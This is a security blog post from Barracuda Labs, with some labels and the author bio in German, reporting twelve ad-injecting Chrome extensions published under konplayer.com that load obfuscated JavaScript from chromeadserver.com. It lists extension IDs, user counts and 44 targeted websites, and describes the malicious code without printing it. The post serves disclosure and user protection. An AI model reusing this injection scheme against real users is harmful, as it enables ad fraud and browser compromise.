The Google Chrome web store has been in the spotlight recently for security risks that some of the tools are causing. Most recently, Google had to remove two Chrome extensions that could sneakily inject ads or malware on websites that would then infect unsuspecting users. There were more than 100,000 users who may have been infected before Google removed the two extensions.
At Barracuda Labs, we have monitored Chrome extension spam since Oct 2012, when we found several spamming extensions using Rovio’s famous puzzle games as the hook to quickly attract 82,000 users in a few days. In the last few weeks, we've detected some new interesting findings about another big spam campaign back in the Chrome web store.
In Summary, we found that 12 Chrome extensions injecting advertisements on 44 popular websites have been installed on more than 180,000 Chrome users, see Table 1.
Table 1: The List of Ads-injecting Chrome Extensions Still Live Till Jan-30-2014
Titel |
URL |
Permissions Required |
01-08 #Users |
01-15 #Users |
01-23 #Users |
01-30 #Users |
logo quiz game | kmkacofigdhiobalbhnklkknlbplmjpj | Your data on all websites |
75257 |
77744 |
81158 |
81994 |
counter strike cs portable | dkbaopnghjggmdcmcoaloenaalokmili | Your data on all websites |
25680 |
26538 |
27549 |
26999 |
snail bob 2 | jdjpjalodncbfhaghlafopfckkchenoi | Your data on all websites, Your tabs and browsing activity |
14983 |
15015 |
15840 |
15851 |
pac-man 80s | njgeoadngonelhmacgjigochdijoofgn | Your data on all websites, Your tabs and browsing activity |
12161 |
12652 |
13389 |
13415 |
draw my thing | hdijmiefiogighmeaonofemaclnfplil | Your data on all websites |
11117 |
11354 |
11961 |
12198 |
nyan cat fly | bphkilcpnjgeegfnmifeifcmkgjngknk | Your data on all websites, Your tabs and browsing activity |
9044 |
9305 |
9857 |
9794 |
tetris flash | cfhhalmjbofkjcgefcaejjdicdddpkkk | Your data on all websites, Your tabs and browsing activity |
8284 |
8558 |
8798 |
8945 |
bubble elements | fcijkonhppildbjgkdaglmeoeemcldha | Your data on all websites, Your tabs and browsing activity |
5126 |
5174 |
5413 |
5384 |
angry halloween hd | emfeoamofdcdeeaicodpfofpfefibaee | Your data on all websites |
2100 |
2127 |
2229 |
2268 |
smart soccer goalkeeper | dfcjfcgpnnnkcppamjpobglgefaoecia | Your data on all websites |
1904 |
1994 |
2089 |
2080 |
pac-xon deluxe | gghdghpgjbaddlnfaopaildhlahpegmp | Your data on all websites, Your tabs and browsing activity |
1788 |
1896 |
1968 |
2024 |
pong | pdiilpimpenppmfcgjhnjkoebelagipj | Your data on all websites, Your tabs and browsing activity |
360 |
404 |
393 |
410 |
Gesamt |
167,804 |
172,761 |
180,644 |
181,362 |
Similarly to last time, all of these extensions are requiring the permission “Your data on all websites” so that the ads can be injected to any websites the users browse.
Meanwhile, all of these extensions are registered under the same developer organization: www.konplayer.com.
Figure 1: one of the ads-injecting extensions from www.konplayer.com with 81,158 users
Different from our last findings, the extension codebase does not directly contain malicious Javascript code itself. Instead, it just uses a reference URL in the code, and hosts the Javascript on another domain: www.chromeadserver.com— which would trick unsuspecting users into thinking that Google owns the domain, but it does not.
After downloading this javascript code from the above URL, it is noticeable that the code started with the jQuery code (a javascript library useful for website design)– seems very benigal. But in the later part, obfuscated javascript began—very suspicious.
Figure 3: Obfuscated javascript code adschrome.js served at chromeadserver.com
After decoding these hexadecimal ASCII chars and put the whole story together, we found the following code and spent some time to understand it – looks familiar.
Figure 4: Obfuscated javascript code adschrome.js
A careful reading on this decoded program shows that it is the source of injecting ads banners on various positions of 44 popular websites. The list of these 44 websites follows:
Table 2: The List of Websites that will be injected with Ads by the Above Chrome Extensions
Webseite |
Webseite |
chrome.angrybirds.com | www.myhappygames.com |
heikki.angrybirds.com | www.chromegamez.com |
poppit.pogo.com | www.gamesvarious.com |
chrome.monsterdashgame.com | msn.com |
www.officewebgames.com | yahoo.com |
game2player.com | youtube.com |
www.flashgames101.com | www.negane.com |
games4chrome.com | imdb.com |
www.tarmogames.com | myspace.com |
www.gamesgator.com | chrome.plantsvszombies.com |
www.douchegames.com | bejeweled.popcap.com |
higamecenter.com | evolvedonlinegames.com |
chromegamebox.com | www.webstoregames.com |
kizi.com | www.wardoom.com |
home.sweetim.com | www.sasquatchsurvivor.com |
www.juegos.com | www.realmofthemadgod.com |
www.miniclip.com | gameboysite.com |
naclgames.com | www.pinkemu.com |
armorgames.com | www.silverstoregames.com |
chrometopgames.com | disney.go.com |
chrome.kingstonking.com | 2048gamers.com |
captainwebstore.com | entanglement.gopherwoodstudios.com |
Meanwhile, we notice that this code was also used in the ads-injecting Chrome extensions disclosed in our last report. They are probably the same group of hackers, except changing its name from www.playook.info to www.konplayer.com.
Google can surely remove these spam extensions from web store for now to protect any future victims, but what if they change their names again, or relocate and tweak the spam codes? Before Google provides a sustainable solution, Chrome users have to learn to protect themselves. As we always advised, Chrome users should be very careful if you intend to install Chrome extensions — even if it is from the Google Chrome web store. Use some common sense to judge whether you need to grant permissions to any extensions. If any of the permissions seem beyond the fence of what it should do, do not install it.
Once again, Google failed to protect Chrome users by allowing these spam extensions on its shelves, certainly something that users should consider when determining which products to use.
Christine Barry ist Senior Chief Blogger und Social Media Manager bei Barracuda. In dieser Rolle hilft sie, Barracuda-Geschichten zum Leben zu erwecken und die Kommunikation zwischen der Öffentlichkeit und den internen Barracuda-Teams zu erleichtern. Bevor sie zu Barracuda kam, war Christine über 15 Jahre lang als Außendiensttechnikerin und Projektmanagerin für K12- und KMU-Kunden tätig. Sie hat mehrere Abschlüsse in Technologie, einen Bachelor of Arts und einen Master of Business Administration. Sie ist Absolventin der University of Michigan.
Vernetzen Sie sich hier auf LinkedIn mit Christine.